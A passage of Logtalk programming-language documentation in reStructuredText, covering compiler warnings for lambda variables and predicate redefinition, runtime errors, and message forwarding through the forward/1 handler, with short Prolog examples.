A warning will be reported for calls that are syntactically correct but most
likely a semantic error. An example is :ref:`control_send_to_self_1` calls in
clauses that apparently are meant to implement recursive predicate definitions
where the user intention is to call the local predicate definition.
.. _errors_lambda_variables:
Lambda variables
~~~~~~~~~~~~~~~~
A warning will be reported for :term:`lambda expressions <lambda expression>`
with unclassified variables (not listed as either :term:`lambda free <lambda free variable>`
or :term:`lambda parameter` variables), for variables playing a dual role
(as both lambda free and lambda parameter variables), and for lambda parameters
used elsewhere in a clause.
.. _errors_predicate_redefinition:
Redefinition of predicates declared in ``uses/2`` or ``use_module/2`` directives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A error will be reported for any attempt to define locally a predicate
that is already declared in an :ref:`directives_uses_2` or
:ref:`directives_use_module_2` directive.
.. _errors_others:
Other warnings and errors
~~~~~~~~~~~~~~~~~~~~~~~~~
The Logtalk compiler will throw an error if it finds a predicate clause
or a directive that cannot be parsed. The default behavior is to report
the error and abort the compilation.
.. _errors_runtime:
Runtime errors
--------------
This section briefly describes runtime errors that result from misuse of
Logtalk built-in predicates, built-in methods or from message sending.
For a complete and detailed description of runtime errors please consult
the Reference Manual.
.. _errors_predicates:
Logtalk built-in predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Most Logtalk built-in predicates checks the type and mode of the calling
arguments, throwing an exception in case of misuse.
.. _errors_methods:
Logtalk built-in methods
~~~~~~~~~~~~~~~~~~~~~~~~
Most Logtalk built-in method checks the type and mode of the calling
arguments, throwing an exception in case of misuse.
.. _errors_sending:
Message sending
~~~~~~~~~~~~~~~
The message sending mechanisms always check if the receiver of a message
is a defined object and if the message corresponds to a declared
predicate within the scope of the sender. The built-in protocol
:ref:`forwarding <apis:forwarding/0>` declares a predicate,
:ref:`methods_forward_1`, which is automatically called (if defined) by
the runtime for any message that the receiving object does not understand.
The usual definition for this error handler is to delegate or forward the
message to another object that might be able to answer it:
::
forward(Message) :-
% forward the message while preserving the sender
[Object::Message].
If preserving the original sender is not required, this definition can
be simplified to:
::
forward(Message) :-
Object::Message.
More sophisticated definitions are, of course, possible.
| 34.153453 | 92 | 0.737382 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.